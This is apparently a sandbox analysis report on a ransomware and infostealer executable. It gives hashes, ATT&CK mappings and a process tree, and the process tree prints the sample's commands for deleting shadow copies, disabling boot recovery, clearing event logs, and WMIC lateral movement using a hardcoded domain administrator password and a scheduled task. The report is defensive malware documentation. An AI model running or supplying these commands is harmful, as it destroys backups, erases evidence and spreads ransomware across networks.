7e7bf63f1b2ba92baaa959119d16a928deab9cadbc7619092c3f9ba8bfc61520

General

Target

8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
Size

1.0MB
MD5

3281b2d95e7123a429001400c10ebe28
SHA1

b97308ea9f9c410188d43c34a867fa42c9e9128e
SHA256

8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1
SHA512

2d8829ba0023a0b0f2e3aaa48301f6458fec20e20c019840610f7f862a54615f46de28a5aeb470ae0df5e046d3a8da0310dc29df0b3f60f36ffe4438c469ff11

Score

10^/10

evasion ransomware spyware

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1476	664	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	664	cmd.exe

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1476 bcdedit.exe
1124 bcdedit.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1476	bcdedit.exe
1124	bcdedit.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe

description	ioc	process
File opened (read-only)	\??\R:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\Y:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\B:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\F:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\I:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\Q:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\K:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\U:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\V:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\L:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\N:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\O:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\T:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\A:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\E:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\G:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\J:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\W:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\X:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\Z:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\H:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\M:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\P:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
File opened (read-only)	\??\S:	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 179 IoCs

Processes:

WMIC.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1252	WMIC.exe
Token: SeSecurityPrivilege	1252	WMIC.exe
Token: SeTakeOwnershipPrivilege	1252	WMIC.exe
Token: SeLoadDriverPrivilege	1252	WMIC.exe
Token: SeSystemProfilePrivilege	1252	WMIC.exe
Token: SeSystemtimePrivilege	1252	WMIC.exe
Token: SeProfSingleProcessPrivilege	1252	WMIC.exe
Token: SeIncBasePriorityPrivilege	1252	WMIC.exe
Token: SeCreatePagefilePrivilege	1252	WMIC.exe
Token: SeBackupPrivilege	1252	WMIC.exe
Token: SeRestorePrivilege	1252	WMIC.exe
Token: SeShutdownPrivilege	1252	WMIC.exe
Token: SeDebugPrivilege	1252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1252	WMIC.exe
Token: SeRemoteShutdownPrivilege	1252	WMIC.exe
Token: SeUndockPrivilege	1252	WMIC.exe
Token: SeManageVolumePrivilege	1252	WMIC.exe
Token: 33	1252	WMIC.exe
Token: 34	1252	WMIC.exe
Token: 35	1252	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1268	WMIC.exe
Token: SeSecurityPrivilege	1268	WMIC.exe
Token: SeTakeOwnershipPrivilege	1268	WMIC.exe
Token: SeLoadDriverPrivilege	1268	WMIC.exe
Token: SeSystemProfilePrivilege	1268	WMIC.exe
Token: SeSystemtimePrivilege	1268	WMIC.exe
Token: SeProfSingleProcessPrivilege	1268	WMIC.exe
Token: SeIncBasePriorityPrivilege	1268	WMIC.exe
Token: SeCreatePagefilePrivilege	1268	WMIC.exe
Token: SeBackupPrivilege	1268	WMIC.exe
Token: SeRestorePrivilege	1268	WMIC.exe
Token: SeShutdownPrivilege	1268	WMIC.exe
Token: SeDebugPrivilege	1268	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1268	WMIC.exe
Token: SeRemoteShutdownPrivilege	1268	WMIC.exe
Token: SeUndockPrivilege	1268	WMIC.exe
Token: SeManageVolumePrivilege	1268	WMIC.exe
Token: 33	1268	WMIC.exe
Token: 34	1268	WMIC.exe
Token: 35	1268	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1432	WMIC.exe
Token: SeSecurityPrivilege	1432	WMIC.exe
Token: SeTakeOwnershipPrivilege	1432	WMIC.exe
Token: SeLoadDriverPrivilege	1432	WMIC.exe
Token: SeSystemProfilePrivilege	1432	WMIC.exe
Token: SeSystemtimePrivilege	1432	WMIC.exe
Token: SeProfSingleProcessPrivilege	1432	WMIC.exe
Token: SeIncBasePriorityPrivilege	1432	WMIC.exe
Token: SeCreatePagefilePrivilege	1432	WMIC.exe
Token: SeBackupPrivilege	1432	WMIC.exe
Token: SeRestorePrivilege	1432	WMIC.exe
Token: SeShutdownPrivilege	1432	WMIC.exe
Token: SeDebugPrivilege	1432	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1432	WMIC.exe
Token: SeRemoteShutdownPrivilege	1432	WMIC.exe
Token: SeUndockPrivilege	1432	WMIC.exe
Token: SeManageVolumePrivilege	1432	WMIC.exe
Token: 33	1432	WMIC.exe
Token: 34	1432	WMIC.exe
Token: 35	1432	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1252	WMIC.exe
Token: SeSecurityPrivilege	1252	WMIC.exe
Token: SeTakeOwnershipPrivilege	1252	WMIC.exe
Token: SeLoadDriverPrivilege	1252	WMIC.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1832 wrote to memory of 1252	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1252	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1252	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1252	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1268	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1268	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1268	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1268	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	WMIC.exe
PID 1832 wrote to memory of 1772	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	cmd.exe
PID 1832 wrote to memory of 1772	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	cmd.exe
PID 1832 wrote to memory of 1772	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	cmd.exe
PID 1832 wrote to memory of 1772	1832	8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe	cmd.exe
PID 1772 wrote to memory of 1432	1772	cmd.exe	WMIC.exe
PID 1772 wrote to memory of 1432	1772	cmd.exe	WMIC.exe
PID 1772 wrote to memory of 1432	1772	cmd.exe	WMIC.exe
PID 1772 wrote to memory of 1432	1772	cmd.exe	WMIC.exe
PID 556 wrote to memory of 564	556	cmd.exe	WMIC.exe
PID 556 wrote to memory of 564	556	cmd.exe	WMIC.exe
PID 556 wrote to memory of 564	556	cmd.exe	WMIC.exe
PID 1476 wrote to memory of 1580	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1580	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1580	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1392	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1392	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1392	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 2008	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 2008	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 2008	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1828	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1828	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1828	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1992	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1992	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1992	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1300	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1300	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1300	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1592	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1592	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1592	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1724	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1724	1476	cmd.exe	wevtutil.exe
PID 1476 wrote to memory of 1724	1476	cmd.exe	wevtutil.exe
PID 556 wrote to memory of 1476	556	cmd.exe	bcdedit.exe
PID 556 wrote to memory of 1476	556	cmd.exe	bcdedit.exe
PID 556 wrote to memory of 1476	556	cmd.exe	bcdedit.exe
PID 556 wrote to memory of 1124	556	cmd.exe	bcdedit.exe
PID 556 wrote to memory of 1124	556	cmd.exe	bcdedit.exe
PID 556 wrote to memory of 1124	556	cmd.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
"C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"
1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
2⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\system32\cmd.exe
cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil cl "security"
2⤵
PID:1580

C:\Windows\system32\wevtutil.exe
wevtutil cl "windows powershell"
2⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil cl "security"
2⤵
PID:2008

C:\Windows\system32\wevtutil.exe
wevtutil cl "Application"
2⤵
PID:1828

C:\Windows\system32\wevtutil.exe
wevtutil cl "HardwareEvents"
2⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil cl "System"
2⤵
PID:1300

C:\Windows\system32\wevtutil.exe
wevtutil cl "Setup"
2⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil cl "Setup"
2⤵
PID:1724

C:\Windows\system32\cmd.exe
cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:556

C:\Windows\System32\Wbem\WMIC.exe
WMIC.exe shadowcopy delete /nointeractive
2⤵
PID:564

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:1476

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1124

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1516

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal on Host

1

T1070

File Deletion

1

T1107

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/564-7-0x0000000000000000-mapping.dmp

Download
memory/1124-25-0x0000000000000000-mapping.dmp

Download
memory/1252-3-0x0000000000000000-mapping.dmp

Download
memory/1268-4-0x0000000000000000-mapping.dmp

Download
memory/1300-18-0x0000000000000000-mapping.dmp

Download
memory/1392-10-0x0000000000000000-mapping.dmp

Download
memory/1432-6-0x0000000000000000-mapping.dmp

Download
memory/1476-24-0x0000000000000000-mapping.dmp

Download
memory/1580-8-0x0000000000000000-mapping.dmp

Download
memory/1580-9-0x000007FEFBF41000-0x000007FEFBF43000-memory.dmp

Filesize
8KB

Download
memory/1592-20-0x0000000000000000-mapping.dmp

Download
memory/1724-22-0x0000000000000000-mapping.dmp

Download
memory/1772-5-0x0000000000000000-mapping.dmp

Download
memory/1828-14-0x0000000000000000-mapping.dmp

Download
memory/1832-2-0x0000000076371000-0x0000000076373000-memory.dmp

Filesize
8KB

Download
memory/1992-16-0x0000000000000000-mapping.dmp

Download
memory/2008-12-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads